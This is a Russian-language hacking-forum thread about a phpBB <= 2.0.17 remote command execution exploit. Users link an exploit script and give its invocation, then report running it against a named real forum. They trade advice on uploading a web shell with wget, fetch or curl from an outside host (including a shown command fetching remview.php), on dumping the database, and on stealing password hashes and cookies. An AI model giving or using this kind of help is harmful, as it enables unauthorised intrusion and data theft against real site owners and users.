phpBB <= 2.0.17
 

phpBB <= 2.0.17
Цель: выполнение произвольных команд на сервере(php-inj)
Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.
Exploit: http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl <URL> <cmd>"


Я использовал эту уязвимость на форуме http://www.abbadon.ru/f/ вроде все получилось.
У меня вопрос можно ли какой нить командой узнать хеш пользователя, или слить базу, и возможно еще залить shell? объясните плиз.

так этож уязвимость представляет собой php injection
так что базу слить канечно можно в любом случае, вот шел записать только если прав хватит, логично?
не в тему но всеже скажу
хреновый канечно у нас FAQ по phpbb чисто реклама рст, ни какой информативности :( мля
кстати еще от себя скажу что странно вроде там php 5.1 а GLOBALS через GET всеравно работает.

какой командой можно базу слить?
или шел залить

может я просто не так делаю :) не ругайтесь ;)


C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ тут_команда

или это делается пл другому?

А команда простая wget http://путь_к шелу.
И он зальётся.

C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ wget http://probnii.newmail
.ru/remview.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
Done. User 234558372 successfully registered!

и дальше вылетает непонятный большой код как будто главной страници :(
может что я сто то неправильно делаю

захожу в командную строку.
иду к папке с перлом и от туда запускаю сплоит.
и дальше C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ команда

чет неполучается ;( сайт http://www.abbadon.ru/f/

попробуй без сплоита делать тогда быстрее во всем разберешся

какким образом ? объясни пожалуйста. Мне просто у этого форума куки нужно выдрать или базу. Вобщем получить достут можно даже без админки.

А может там wget нету а чтото другое и шел не залился.Попробуй вместо wget fetch ili curl вставить.

вот здесь
http://www.hardened-php.net/advisory_172005.75.html
первое описание баги челом который её нашел, к томуже подскажу что вся фишка в файле
includes/usercp_register.php

эффект тот же ни чего не происходит как будто что то не так делаю

ссылки не вижу ? И в это файле вот что "Hacking attempt"

Загадками говориш ;))

ребята я просто хочу чтоб вы не пользовались тупо сплоитами, а и головой думали
я исправил немного скрипт чтоб сплоит рст там не пахал

Так сплойт только для 5 пхп вроде или я ошибаюсь ?

Ну у меня тогда такой вопрос каим образом можно базу слить?
И можно ли е слить через сплоит из командной стоки Windows

Нужно sql клиент(шел) залить конечно пароли к БД и dump сделаеш.

А база там не меньше 500МБ сможеш слить,а и зачем тебе.

Стукни мне 323945339

Ну у кого нить хоть получится сделать http://www.abbadon.ru/f/

Я никак не могу в командах разобраься и цпуе пробовал и др шелл никак не могу залить может я что то не так делаю, подскажите.

Именно то, что тебе надо проще всего в этой версии через хсс реализовать... А чем кстати тебе этот форум не угодил, что ты сразу две темы про него создал? Если не секрет конечно. )

Я его версию не знаю? вот тоже в чем проблема.

когда shell запускаю из CMD команда ls и некоторые другие работают файлы показывают . А вот какая команда и как ее правильно писать чтобы шелл залить не знаю. И как слить базу тоже не занаю. Хеш нужен тоже но Xss не подходит. Вот и прошу подсказать как правильно команды написать.

Ссылку на XSS не даш?

Сплойт на етот форум дружок не работает.Там командъй cat,locate,pwd и так далее не работают.неможеш прочитать config.php и шел несможеш залить.Исчи другую дъру.

Я очень плохо отношусь к тем кто не узает поиск + оставляет прямые ссылки на сайты в этом разделе.
Итог: тема закрыта.
ЧИтаем руководство новичка.